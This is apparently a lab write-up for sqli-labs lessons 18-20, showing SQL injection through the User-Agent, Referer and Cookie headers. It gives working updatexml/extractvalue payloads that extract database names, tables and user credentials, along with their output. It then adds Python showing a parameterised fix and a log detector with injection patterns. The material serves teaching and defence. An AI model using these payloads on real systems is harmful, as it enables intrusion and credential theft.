SQLi-labs: Lesson 18-20

Header injection.

Lesson 18 echoes the 'User Agent' header.

Lesson 19 echoes the 'Referer' header.

Lesson 20 echoes almost all HTTP headers; the 'Cookie' header is used for injection.

I mainly use the updatexml() and extractvalue() functions in this chapter, but the other methods (e.g. floor, name_const, join) from previous chapters also work here.


Lesson 18

First append a single quote (') to the 'User Agent' header; the error message is:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'Dumb')' at line 1

Append the following queries to the 'User Agent' header:

  1. Get version

    ' and updatexml(1, concat(0x5c, @@version,0x5c),1),1,1)#

    or

    ' and extractvalue(1,concat(0x5c, version(), 0x5c)),1,1)#

    Result: Your User Agent is: ... XPATH syntax error: '\5.6.30-1\'

  2. Get user

    ' and updatexml(1, concat(0x5c, user(), 0x5c),1),1,1)#

    or

    ' and extractvalue(1,concat(0x5c, user(), 0x5c)),1,1)#

    Result: Your User Agent is: ... XPATH syntax error: '\root@localhost\'

  3. Get database

    ' and updatexml(1, concat(0x5c, database(), 0x5c),1),1,1)#

    or

    ' and extractvalue(1,concat(0x5c, database(), 0x5c)),1,1)#

    Result: XPATH syntax error: '\security\'

  4. Get tables

    ' or updatexml(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c),1),1,1)#

    or

    ' or extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c)),1,1)#

    Result: XPATH syntax error: '\emails,referers,uagents,users\'

  5. Get columns

    ' or updatexml(1,concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 0x5c),1),1,1)#

    or

    ' or extractvalue(1,concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 0x5c)),1,1)#

    Result: XPATH syntax error: '\id,username,password\'

  6. Get data (change the substr index and length to get the next id+username+password)

    ' or updatexml(1,concat(0x5c, substr((select group_concat(id,'+',username,'+',password) from users),1,20), 0x5c),1),1,1)#

    or

    ' or extractvalue(1,concat(0x5c, substr((select group_concat(id,'+',username,'+',password) from users),1,20), 0x5c)),1,1)#

    Result: XPATH syntax error: '\1+Dumb+Dumb,2+Angeli\'


Lesson 19

First append a single quote (') to the 'Referer' header; the error message is:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1

Append the following queries to the 'Referer' header:

e.g. Get version

' and updatexml(1,concat(0x7c,version(),0x7c),1),1)#

or

' and extractvalue(1,concat(0x7c,version(),0x7c)),1)#

Result: XPATH syntax error: '|5.6.30-1|'

Others are similar.


Lesson 20

First append a single quote (') to the 'Cookie' header; the error message is:

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Dumb'' LIMIT 0,1' at line 1

Append the following queries to the 'Cookie' header on the index page:

e.g. Get version

' and updatexml(1,concat(0x7c,version(),0x7c),1)#

Result: Issue with your mysql: XPATH syntax error: '|5.6.30-1|'

Others are similar.
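All three lessons share one root cause: a request header is pasted into an INSERT statement with hand-written quotes, so a single quote in the header ends the string literal and the rest of the value is parsed as SQL. The following Python is an added example, not the sqli-labs PHP source. It reconstructs the vulnerable pattern for lesson 18 (the exact INSERT is an assumption inferred from the error text "near '127.0.0.1', 'Dumb')'"), puts the parameterised version beside it, and runs a small detector over constructed access-log lines to flag header values carrying the updatexml()/extractvalue() markers seen in lessons 18-20. The function names, table layout and log lines are all constructed for this example; SQLite stands in for MySQL, so the XPATH-error trick itself is not reproduced, only the quote breaking the statement.

```python
"""Added example (not part of the sqli-labs write-up or its PHP code)."""
import re
import sqlite3


# -- 1. The vulnerable pattern: header value concatenated into SQL ----------
def build_insert_unsafe(uagent: str, ip: str, username: str) -> str:
    """Assumed shape of the lesson-18 query: every value is quoted by hand."""
    return (
        "INSERT INTO uagents (uagent, ip_address, username) "
        f"VALUES ('{uagent}', '{ip}', '{username}')"
    )


def run_unsafe(conn: sqlite3.Connection, uagent: str) -> str:
    """Execute the concatenated statement; return 'ok' or the DB error text.
    A lone quote in the header breaks the statement, which is the first
    probe the write-up describes (SQLite has no updatexml(), so the
    XPATH-error leak is not reproduced here, only the syntax break)."""
    try:
        conn.execute(build_insert_unsafe(uagent, "127.0.0.1", "Dumb"))
        return "ok"
    except sqlite3.Error as exc:
        return f"error: {exc}"


# -- 2. The fix: bound parameters, the driver handles quoting ----------------
def store_uagent_safe(conn: sqlite3.Connection, uagent: str) -> str:
    """Parameterised INSERT: the header is stored as data, never parsed as SQL.
    Returns the value read back from the table, which equals the input."""
    conn.execute(
        "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
        (uagent, "127.0.0.1", "Dumb"),
    )
    row = conn.execute(
        "SELECT uagent FROM uagents ORDER BY rowid DESC LIMIT 1"
    ).fetchone()
    return row[0]


def fresh_db() -> sqlite3.Connection:
    """In-memory table mirroring the assumed uagents layout."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)"
    )
    return conn


# -- 3. Detection: header values carrying error-based injection markers -----
# Patterns drawn from the payload shapes used in lessons 18-20: the XML
# functions, information_schema lookups, a quote followed by AND/OR, and a
# trailing MySQL comment.  Expect occasional false positives on odd but
# legitimate User-Agent strings; treat a hit as a triage signal.
SUSPICIOUS = re.compile(
    r"(updatexml|extractvalue)\s*\("
    r"|information_schema\."
    r"|'\s*(and|or)\b"
    r"|(#|--\s)\s*$",
    re.IGNORECASE,
)


def flag_header(value: str) -> bool:
    """True when a header value matches one of the injection markers."""
    return SUSPICIOUS.search(value) is not None


# Constructed access-log lines (combined format: ... "referer" "user-agent").
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:00:00:00 +0000] "GET /Less-18/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '127.0.0.1 - - [01/Jan/2024:00:00:01 +0000] "GET /Less-18/ HTTP/1.1" 200 1 "-" "\' and updatexml(1, concat(0x5c, @@version,0x5c),1),1,1)#"',
    '127.0.0.1 - - [01/Jan/2024:00:00:02 +0000] "GET /Less-19/ HTTP/1.1" 200 1 "\' and extractvalue(1,concat(0x7c,version(),0x7c)),1)#" "curl/8.0"',
    '127.0.0.1 - - [01/Jan/2024:00:00:03 +0000] "GET /Less-20/ HTTP/1.1" 200 1 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0)"',
]
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "[^"]*" \d+ \d+ '
    r'"(?P<referer>[^"]*)" "(?P<uagent>[^"]*)"$'
)


def suspicious_requests(lines):
    """Return (line_no, header_name) for every flagged Referer/User-Agent."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for name in ("referer", "uagent"):
            if flag_header(m.group(name)):
                hits.append((n, name))
    return hits


if __name__ == "__main__":
    payload = "' and updatexml(1, concat(0x5c, @@version,0x5c),1),1,1)#"
    print(run_unsafe(fresh_db(), "'"))            # the statement breaks
    print(store_uagent_safe(fresh_db(), payload)) # stored verbatim, harmless
    print(suspicious_requests(SAMPLE_LOG))        # [(2, 'uagent'), (3, 'referer')]
```

The two INSERT functions are the whole fix for lessons 18-20: with bound parameters the lesson's payload is just a long string in the uagents table, and the XPATH error the write-up relies on never occurs. The detector is the defender's view of the same payloads, useful for a quick sweep of web-server logs after the lab or in a WAF rule.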
